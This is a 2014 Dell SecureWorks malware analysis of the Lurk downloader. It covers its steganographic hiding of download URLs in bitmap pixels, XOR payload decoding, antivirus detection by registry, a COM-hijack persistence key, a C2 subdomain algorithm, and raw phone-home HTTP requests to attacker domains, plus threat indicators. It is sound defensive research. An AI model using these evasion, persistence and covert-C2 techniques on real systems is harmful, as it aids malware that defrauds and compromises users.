• Author: Brett Stone-Gross, Ph.D., Dell SecureWorks Counter Threat Unit
  • Date: 7 August 2014

Overview

Lurk is a malware downloader that uses digital steganography: the art of hiding secret information within a digital format, such as an image, audio, or video file. Lurk specifically uses an algorithm that can embed encrypted URLs into an image file by inconspicuously manipulating individual pixels. The resulting image contains additional data that is virtually invisible to an observer. Lurk's primary purpose is to download and execute secondary malware payloads. In particular, the Dell SecureWorks Counter Threat Unit™ (CTU) research team has observed Lurk dropping malware used to commit click fraud.

Some malware families, notably the KINS banking trojan (which is based on leaked Zeus source code and is also known as ZeusVM), have incorporated non-digital steganographic techniques. The most commonly used method simply appends data (such as a configuration file or a command) to the end of an image file. These modifications are relatively easy to detect by a commercially available intrusion prevention system (IPS) or intrusion detection system (IDS). In contrast, it is unlikely that existing IPS/IDS devices could detect data that is concealed with digital steganography. As a result, Lurk may be able to evade network defenses and hide in plain sight.

Malware distribution

Distribution of the Lurk malware was first described in February 2014 by a security researcher known as Kafeine. At the time, Lurk was being propagated through an HTML iFrame on compromised websites that loaded a Flash-based exploit for CVE-2013-5330. If a person visiting one of these websites was running a vulnerable version of Adobe Flash, the exploit dropped a DLL file and executed the Lurk malware. When CTU researchers began investigating Lurk, they found very little published information about the malware's behavior, operation, and function. This lack of information may be due to Lurk's unconventional implementation and use of digital steganography.

Lurk dropper

Lurk consists of two components: a dropper DLL and a payload DLL. The dropper DLL’s main purpose is to extract and load the payload DLL. As shown in Figure 1, the Lurk dropper DLL contains several exports that appear to be legitimate, but in fact lead to garbage code designed to mislead antivirus products and security researchers. Lurk's real dropper code is contained in the DLLMain function. In some Lurk samples, the malware payload is embedded as data in the resource section. The extraction code begins by deriving an XOR key that is used to decrypt the payload DLL. The key is obtained by performing an XOR operation on a hard-coded value of length N with the first N bytes of the embedded data. After deriving the key, the malware payload is decoded by performing another XOR operation on each byte of data from offset N with each byte of the XOR key.


Figure 1. The export table from a Lurk sample. (Source: Dell SecureWorks)

Some Lurk variants load a bitmap image from the resource section of the dropper DLL. Figure 2 shows two bitmap images from the resource section of Lurk samples. The seemingly random noise in the right-half of the images is the actual malware code that is extracted by calling several Windows graphics API functions.


Figure 2. Primary Lurk DLL malware code embedded in two bitmap images. (Source: Dell SecureWorks)

Behavior

After the main Lurk payload DLL executes, it checks the infected system for the installation of 52 different security products (see Table 1) by searching the registry for keys under HKEY_LOCAL_MACHINE\Software and HKEY_CURRENT_USER\Software. If Lurk detects any of the 21 products indicated in bold italics, it does not install itself on the infected system. If the check does not reveal any of the 21 products, Lurk adds the detected products to an integer array list that is sent to the command and control (C2) server.

McAfee Zone Labs Symantec FRISK Software
AVG Microsoft\OneCare Protection Classes\CLSID\
{D5507020-DB45-11d1-A5F0-00600872F78D}
Sophos
Symantec\PatchInst\NIS Microsoft\Microsoft Antimalware HAURI\ViRobot Classes\*\shellex\ContextMenuHandlers\
TrustPortAntivirusMenuHandler
MicroWorld K7 Computing GFI Software\VIPRE Internet Security Kingsoft
PCSI Antiy Labs rising Panda Software
Emsi Software GmbH Hacksoft ComodoGroup G DATA
WRData Safer Networking Limited JiangMin PCTools
KasperskyLab ALWIL Software\Avast Ahnlab Virusbuster
Quick Heal TrendMicro Microsoft\Windows Defender Ikarus
Immunet Protect Malwarebytes' Anti-Malware Emsi Software GmbH Bullguard Ltd.
ArcaBit AVAST Software ESET Avira
BitDefender Doctor Web CA Vba32
Authentium Data Fellows\F-Secure SBAMSvc Central Command

Table 1. Security products checked by Lurk. (Source: Dell SecureWorks)

Lurk installs itself on the infected system by copying itself to a temporary directory via the GetTempPathA Windows API function. It uses a filename assigned by GetTempFileNameA appended with a ".tmp" extension. The malware establishes persistence by creating the registry key: HKEY_CURRENT_USER\ SOFTWARE\Classes\CLSID\{A3CCEDF7-2DE2-11D0-86F4-00A0C913F750}\InProcServer32, with the default value set to the path of the Lurk DLL in the temporary directory and the ThreadingModel value set to "both." The registry keys ensure that Lurk's DLL will be loaded into the process space of the COM client executable specified by the CLSID "A3CCEDF7-2DE2-11D0-86F4-00A0C913F750," which corresponds to Internet Explorer's PNG plugin image decoder. This is important because Lurk will only run in the context of Internet Explorer (iexplore.exe) or Firefox (firefox.exe).

Phone home

Lurk is heavily obfuscated and uses several custom algorithms to encrypt strings for its C2 servers, imports, registry keys, and security products searches. After deobfuscating the C2 server strings, the URLs appear similar to the following:

  • hxxp://wxyz.alphaeffects.net/lolo/
  • hxxp://wxyz.mesjunio.com/lolo/
  • hxxp://95.211.169.162/lolo/

The malware then appends the five parameters listed in Figure 3 to the path. The first parameter is a hard-coded value that appears relatively consistently across samples as 30 or 31, which may indicate the malware's version number. The constant is followed by the volume serial number of the infected system (converted to decimal), another hard-coded constant that varies across samples, and an array of integers that represents the installed security products, appended with an ".html" extension.


Figure 3. Lurk phone-home parameters. (Source: Dell SecureWorks)

The malware computes a unique four-character subdomain that is dependent on the volume serial number, which replaces the "wxyz" string in the example URLs listed earlier in this section. For the first hard-coded domain (hxxp://wxyz.alphaeffects.net/lolo/ in the example), the calculation takes each byte of the volume serial number modulo 26 and adds the ordinal value of lowercase 'a' to derive each character. The result is a lowercase letter 'a' through 'z'. For instance, the subdomain for volume serial number 0x5802a4a2 (little endian) is "gick". The second domain (hxxp://wxyz.mesjunio.com/lolo/ in the example) uses the same algorithm, except '22' is added to each byte of the volume serial number. The Lurk C2 domains use wildcard DNS to resolve all subdomains.

The phone-home request has the following format. The User-Agent field is hard-coded and may not be a reliable signature because it is the default value for Internet Explorer 8 on a Windows XP system.

    GET /lolo/30/1476568226/50095/000103.html
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
    Host: gick.alphaeffects.net
    Cache-Control: no-cache
    
    
    

The malware can be configured to send the phone-home request over HTTP on port 80 or over HTTPS on port 443 to make signature-based network detection more difficult without performing an SSL man-in-the-middle attack. The reply from the C2 server is a bitmap image that contains a URL of where to download a malware executable. The URL is encrypted and embedded in the bitmap image using steganography.

Extracting the download URL through steganography

Lurk hides the downloader URLs using a steganographic technique that embeds information in the least significant bit (LSB) of every byte. The malware embeds its data in the individual color pixels that form a bitmap image. Figure 4 shows a typical Lurk bitmap file that contains an encrypted and embedded download URL in the image. The tan outline is not present in the image but is shown for contrast and readability.


Figure 4. Lurk bitmap containing download URL embedded and encrypted within the image. (Source: Dell SecureWorks)

Figure 5 is the hexadecimal representation of the complete image file. The first 14 bytes of the image form the bitmap header:

  • Bytes 1-2 ("BM") (green): Bitmap signature
  • Bytes 2-6 (orange): File size
  • Bytes 6-10 (purple): Reserved
  • Bytes 10-14 (blue): Data offset

The next 40 bytes are the bitmap info headers. The embedded data begins at byte 0x36 (decimal 54), beginning with the encoded offset (highlighted in red).


Figure 5. Lurk image data. (Source: Dell SecureWorks)

Extracting data from the image

The malware reads the first 32 bytes immediately after the bitmap header and bitmap info headers at byte offset 0x36. Figure 6 shows the first eight bytes of encoded data in the bitmap image at this offset.


Figure 6. First eight bytes of Lurk-encoded data contained in a bitmap image. (Source: Dell SecureWorks)

To understand how the data is encoded, each byte can be converted into binary:

  • 0xff = 11111111
  • 0xfe = 11111110

The least significant bit is shown in bold. A value of 0xff is used to encode a 1, and 0xfe is used to encode a 0. Using this algorithm, Lurk can encode one bit of information for every eight bits (or 1 byte) of data.

Table 2 shows how the eight bytes listed in Figure 6 encode the following data:

  • 01000000 (0x40 in hexadecimal)

Decoding the hidden information from the first 32 bytes results in the value 0xa40. This value is added to a hard-coded value of 0x76, which is then used to locate the offset of the encoded malware URL. The same algorithm is then applied to extract the bytes representing the malware URL.

Byte   1     2     3     4     5     6     7     8  
MSB 1 1 1 1 1 1 1 1
  1 1 1 1 1 1 1 1
  1 1 1 1 1 1 1 1
  1 1 1 1 1 1 1 1
  1 1 1 1 1 1 1 1
  1 1 1 1 1 1 1 1
  1 1 1 1 1 1 1 1
LSB 0 1 0 0 0 0 0 0
Value 0 1 0 0 0 0 0 0

Table 2. Table of binary values used to extract hidden data in Lurk bitmap images.

Changing the least significant bit has a minimal impact on a pixel's color. Figure 7 shows the almost imperceptible difference between flipping the least significant two bits of a white pixel. The technique of embedding information in the least significant byte demonstrates how subtle the color changes are to individual pixels.


Figure 7. Effect of flipping one and two bits from each color channel. The circle around the three white rectangular regions shows how the white color changes slightly as the number of bits is flipped. (Source: Dell SecureWorks)

After the bytes are extracted from the image, the URL is encrypted with a custom string obfuscation algorithm. The following URL results from this image after extraction and decryption:

  • hxxp://zvld.alphaeffects.net/d/1721174125.zl

Lurk issues an HTTP GET request to the URL specified in the bitmap image and downloads the payload. The payload is obfuscated using a four-byte XOR key that is hard-coded into the malware. After downloading the payload, Lurk creates an Internet Explorer process and injects the payload into it.

Lurk malware payloads

Threat actors could use the Lurk downloader to upload various types of malware (e.g., banking trojans, ransomware, rogue antivirus software) onto a victim's system, but the malware payloads downloaded by Lurk as of this publication are used for click fraud. The click-fraud malware phones home to track . helpertrack . com to receive a click-fraud template with a request in the following format:

    GET /log/<volume_serial_number>/<int>/?id=<int> HTTP/1.1
    Host: track.helpertrack.com
    Connection: Keep-Alive
    
    
    

The reply from the C2 server is a click-fraud template that is compressed with gzip and encrypted. The click-fraud template is in JSON format and contains instructions for creating fraudulent impressions and clicks by loading a series of iFrames with spoofed referrers.

Threat indicators

The threat indicators in Table 3 can be used to detect activity related to the Lurk downloader. The domains and IP address listed in the indicators table may contain malicious content, so consider the risks before opening them in a browser.

Indicator Type Context
e9cab9097e7f847b388b1c27425d6e9a MD5 hash Lurk sample
e9da19440fca6f0747bdee8c7985917f MD5 hash Lurk sample
f5022eae8004458174c10cb80cce5317 MD5 hash Lurk sample
e006469ea4b34c757fd1aa38e6bdaa72 MD5 hash Lurk sample
c461706e084880a9f0409e3a6b1f1ecd MD5 hash Lurk sample
e8da52e2e0622c5bcb8aa7adbdb064d8 MD5 hash Lurk sample
1adceec5717679b38682e7c9ac17ec82 MD5 hash Lurk sample
ae23ad4c3a5e2660096874bf8306ef49 MD5 hash Lurk sample
HKEY_CURRENT_USER\ SOFTWARE\Classes\CLSID\
{A3CCEDF7-2DE2-11D0-86F4-00A0C913F750}\
InProcServer32
Registry key Lurk persistence mechanism
*.cooperatemedia.com Domain name C2 server
*.adsoas.com Domain name C2 server
*.mesjunio.com Domain name C2 server
*.alphaeffects.net Domain name C2 server
track.helpertrack.com Domain name C2 server (click-fraud template server)
95.211.169.162 IP address C2 server

Table 3. Threat indicators for the Lurk downloader.

Conclusion

Malware is constantly evolving to stay one step ahead of computer security researchers and law enforcement. Threat actors invest considerable effort into hardening their botnets, making the botnet infrastructures more resilient to takedown attempts (e.g., by using peer-to-peer networks) and encrypting data (sometimes via strong public key cryptography) to prevent eavesdropping. A recent botnet trend as of this publication is hiding malware traffic in plain sight through techniques such as HTML comment tags, text on public websites, and fake image files. In some instances, malware uses digital steganography to embed data into an image. The Lurk downloader demonstrates the power and versatility of this technique and how it can be used to evade network detection and manual scrutiny by malware researchers. Steganography can make it exceedingly difficult to detect the presence of hidden information such as a configuration file, binary update, or bot command, especially in digital files. As a result, the use of steganography in malware may become more prevalent in the future.